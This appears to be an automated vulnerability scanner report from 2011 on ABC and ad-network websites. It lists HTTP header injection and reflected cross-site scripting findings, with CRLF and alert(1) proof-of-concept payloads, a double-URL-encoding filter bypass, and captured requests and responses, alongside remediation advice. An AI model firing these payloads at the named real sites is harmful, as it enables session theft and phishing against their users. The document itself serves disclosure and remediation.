HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the crtp request parameter is copied into the X-FW-Error-Info response header. The payload 409f0%0d%0a5b4a6ad39e3 was submitted in the crtp parameter. This caused a response containing an injected HTTP header.
The value of the pvrn request parameter is copied into the Set-Cookie response header. The payload d0907%0d%0a2a6cd9637fb was submitted in the pvrn parameter. This caused a response containing an injected HTTP header.
The value of the cr request parameter is copied into the Location response header. The payload 88a05%0d%0af80ac945c86 was submitted in the cr parameter. This caused a response containing an injected HTTP header.
The value of the code request parameter is copied into the Location response header. The payload 1fa47%0d%0af0b477bcb63 was submitted in the code parameter. This caused a response containing an injected HTTP header.
The value of REST URL parameter 2 is copied into the Location response header. The payload ec08b%0d%0a7aef034c3c1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc.).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the asid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c73b8"%3balert(1)//709e783100b was submitted in the asid parameter. This input was echoed as c73b8";alert(1)//709e783100b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the caid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e823d"%3balert(1)//fb691e1ccbe was submitted in the caid parameter. This input was echoed as e823d";alert(1)//fb691e1ccbe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the csid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2e94"%3balert(1)//153f43ad13b was submitted in the csid parameter. This input was echoed as b2e94";alert(1)//153f43ad13b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pvrn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d153"%3balert(1)//aad410652c8 was submitted in the pvrn parameter. This input was echoed as 5d153";alert(1)//aad410652c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
(function(){ var pht = !!(''); var psd = window._fw_link_tag_scan_delay || 1*''; var mkv = !(''); if (isNaN(psd)) psd = 0; var am = function(f) { try { return f._fw_admanager && (f._fw_admanager.load ...[SNIP]... setTimeout(f, 10); setTimeout(d, 15000); }; window._fw_slot_urls = []; var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72766&ssnw=&csid=fox_home&sfid=&cdid=&pvrn=4387245d153";alert(1)//aad410652c8&vprn=&vip=50.23.123.106&vdur=&flag=;position=1&;ptgt=s&slid=172x235slot1&envp=g_js&w=172&h=235&lo="; if (document.addEventListener) { document.addEventListener( "DOMContentLoaded", e, false ); do ...[SNIP]...
The value of the slid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea261"%3balert(1)//192f5f5f8da was submitted in the slid parameter. This input was echoed as ea261";alert(1)//192f5f5f8da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
(function(){ var pht = !!(''); var psd = window._fw_link_tag_scan_delay || 1*''; var mkv = !(''); if (isNaN(psd)) psd = 0; var am = function(f) { try { return f._fw_admanager && (f._fw_admanager.load ...[SNIP]... ; var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72766&ssnw=&csid=fox_home&sfid=&cdid=&pvrn=438724&vprn=&vip=50.23.123.106&vdur=&flag=;position=1&;ptgt=s&slid=172x235slot1ea261";alert(1)//192f5f5f8da&envp=g_js&w=172&h=235&lo="; if (document.addEventListener) { document.addEventListener( "DOMContentLoaded", e, false ); document.addEventListener( "load", e, false ); } else if (window.attachEve ...[SNIP]...
The value of the slid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e863b'%3balert(1)//2cbc42ff0ae was submitted in the slid parameter. This input was echoed as e863b';alert(1)//2cbc42ff0ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ssid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86690"%3balert(1)//516bfa20066 was submitted in the ssid parameter. This input was echoed as 86690";alert(1)//516bfa20066 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the vprn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed988"%3balert(1)//c4cc2308232 was submitted in the vprn parameter. This input was echoed as ed988";alert(1)//c4cc2308232 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 29e93%253cscript%253ealert%25281%2529%253c%252fscript%253ec860dc188c0 was submitted in the REST URL parameter 5. This input was echoed as 29e93<script>alert(1)</script>c860dc188c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/gremlin/css/files/csar-ad,slideshow,carousellist,full-episode-carousel-list,video-clips-list,list,join,featured,poll.css29e93%253cscript%253ealert%25281%2529%253c%252fscript%253ec860dc188c0?cb=v5.96 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://abc.go.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Length: 24829
Content-Type: text/css
Last-Modified: Sun, 02 Oct 2011 22:58:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed10
X-Powered-By: ASP.NET
Cache-Expires: Sun, 02 Oct 2011 23:58:22 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=300
Date: Sun, 02 Oct 2011 22:58:23 GMT
Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1f02d%253cscript%253ealert%25281%2529%253c%252fscript%253e528beb3d46c was submitted in the REST URL parameter 5. This input was echoed as 1f02d<script>alert(1)</script>528beb3d46c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/gremlin/css/files/home-page,generic,featured-start.css1f02d%253cscript%253ealert%25281%2529%253c%252fscript%253e528beb3d46c?cb=v5.96 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://abc.go.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Length: 10892
Content-Type: text/css
Last-Modified: Sun, 02 Oct 2011 22:58:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed02
X-Powered-By: ASP.NET
Cache-Expires: Sun, 02 Oct 2011 23:58:22 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=300
Date: Sun, 02 Oct 2011 22:58:23 GMT
Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bdd50%253cscript%253ealert%25281%2529%253c%252fscript%253e0db0440f260 was submitted in the REST URL parameter 5. This input was echoed as bdd50<script>alert(1)</script>0db0440f260 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/gremlin/css/files/reset,style,global,register-loader,social-link,textmessage,upgrade,abc-community,share-global,facebooklike.cssbdd50%253cscript%253ealert%25281%2529%253c%252fscript%253e0db0440f260?cb=v5.96 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://abc.go.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Length: 32879
Content-Type: text/css
Last-Modified: Sun, 02 Oct 2011 22:58:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed07
X-Powered-By: ASP.NET
Cache-Expires: Sun, 02 Oct 2011 23:58:26 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=300
Date: Sun, 02 Oct 2011 22:58:26 GMT
Connection: close
The value of REST URL parameter 5 is copied into a JavaScript inline comment. The payload 85104%252a%252falert%25281%2529%252f%252f1219963b799 was submitted in the REST URL parameter 5. This input was echoed as 85104*/alert(1)//1219963b799 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/gremlin/js/files/abchomepage,sfplayer,feplayer,breakingnews,browsercheck,featured-start.js85104%252a%252falert%25281%2529%252f%252f1219963b799?cb=v5.96 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://abc.go.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Length: 9679
Content-Type: text/javascript
Last-Modified: Sun, 02 Oct 2011 22:58:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed05
X-Powered-By: ASP.NET
Cache-Expires: Sun, 02 Oct 2011 23:58:24 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=293
Date: Sun, 02 Oct 2011 22:58:24 GMT
Connection: close
The value of REST URL parameter 5 is copied into a JavaScript inline comment. The payload 2e5e6%252a%252falert%25281%2529%252f%252f76f80514488 was submitted in the REST URL parameter 5. This input was echoed as 2e5e6*/alert(1)//76f80514488 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/gremlin/js/files/jquery,ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js2e5e6%252a%252falert%25281%2529%252f%252f76f80514488?cb=v5.96 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://abc.go.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Length: 217378
Content-Type: text/javascript
Last-Modified: Sun, 02 Oct 2011 22:58:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed09
X-Powered-By: ASP.NET
Cache-Expires: Sun, 02 Oct 2011 23:58:34 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=300
Date: Sun, 02 Oct 2011 22:58:35 GMT
Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9fed7%253cscript%253ealert%25281%2529%253c%252fscript%253edf41d8fefd8 was submitted in the REST URL parameter 5. This input was echoed as 9fed7<script>alert(1)</script>df41d8fefd8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/gremlin/js/files/utils-easing,itemSlider,slideshow,logger,carousellist,join,jquery-cycle-all,featured,form,validate,poll.js9fed7%253cscript%253ealert%25281%2529%253c%252fscript%253edf41d8fefd8?cb=v5.96 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://abc.go.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Length: 88703
Content-Type: text/javascript
Last-Modified: Sun, 02 Oct 2011 22:58:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed10
X-Powered-By: ASP.NET
Cache-Expires: Sun, 02 Oct 2011 23:58:32 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=284
Date: Sun, 02 Oct 2011 22:58:33 GMT
Connection: close
2.15. http://abc.go.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://abc.go.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7acb4"%3balert(1)//63f7b085878 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7acb4";alert(1)//63f7b085878 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Length: 87269
Content-Type: text/html; charset=UTF-8
Last-Modified: Sun, 02 Oct 2011 22:58:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc01
X-Powered-By: ASP.NET
Cache-Expires: Sun, 02 Oct 2011 23:01:56 GMT
Date: Sun, 02 Oct 2011 22:58:56 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml ...[SNIP]... bc.csar.go.com/DynamicCSAd?srvc=abc&itype=ThinBanner&itype=Rectangles&itype=Background&itype=LRGutters&itype=PopUnder&itype=Survey&itype=FPBranding&itype=Banner-Unicast&itype=RevenueScience&url=/index?7acb4";alert(1)//63f7b085878=1"; var paramD = "&"; var regexS = "[\?&]test=([^&#]*)"; var regex = new RegExp( regexS ); var resultsT = regex.exec( window.location.href ); if(resultsT != null) csarUrl += paramD + "test="+ resul ...[SNIP]...
The value of the requestId request parameter is copied into the HTML document as plain text between tags. The payload 66ef5<script>alert(1)</script>d34c2adb418 was submitted in the requestId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cecda<script>alert(1)</script>8fe0763fb0b was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the u request parameter is copied into the HTML document as plain text between tags. The payload 3cc2f<script>alert(1)</script>6f59c4c5e7b was submitted in the u parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5adf9'-alert(1)-'e703109e196 was submitted in the Z parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 22:52:41 GMT
Content-Length: 697
The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb91a'-alert(1)-'1af8fb6eb1c was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 22:52:55 GMT
Content-Length: 697
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 51f23<script>alert(1)</script>3d1eaa1fce was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 22:51:38 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2509
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "211776751f23<script>alert(1)</script>3d1eaa1fce"
The value of the placementId request parameter is copied into an HTML comment. The payload 3c709--><script>alert(1)</script>f681079bcf was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 22:51:28 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3306
Content-Type: text/plain
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "15009293c709--><script>alert(1)</script>f681079bcf" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload 239e4--><script>alert(1)</script>ff78946a10b was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 22:51:50 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3748
Content-Type: text/plain
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<body>
<!-- java.lang.NumberFormatException: For input string: "-1239e4--><script>alert(1)</script>ff78946a10b" -->
The value of the flash request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66f79'%3balert(1)//f482c983bae was submitted in the flash parameter. This input was echoed as 66f79';alert(1)//f482c983bae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b326'-alert(1)-'ad2160818d9 was submitted in the redir parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the time request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 495cf'%3balert(1)//72dae9d4c18 was submitted in the time parameter. This input was echoed as 495cf';alert(1)//72dae9d4c18 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eceb9"%3balert(1)//8e5bf6d142d was submitted in the type parameter. This input was echoed as eceb9";alert(1)//8e5bf6d142d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 21b7c<script>alert(1)</script>2b8e828c0be was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload bf7b0<script>alert(1)</script>b73cb9f2da3 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload f8dca<script>alert(1)</script>638a85fbe05 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 7b374<script>alert(1)</script>a269ac575a9 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload b7d3d<script>alert(1)</script>c39da1e82c was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload ef225<script>alert(1)</script>616bae54eeb was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the site request parameter is copied into the HTML document as plain text between tags. The payload 43357<script>alert(1)</script>fb7066d837f was submitted in the site parameter. This input was echoed unmodified in the application's response.
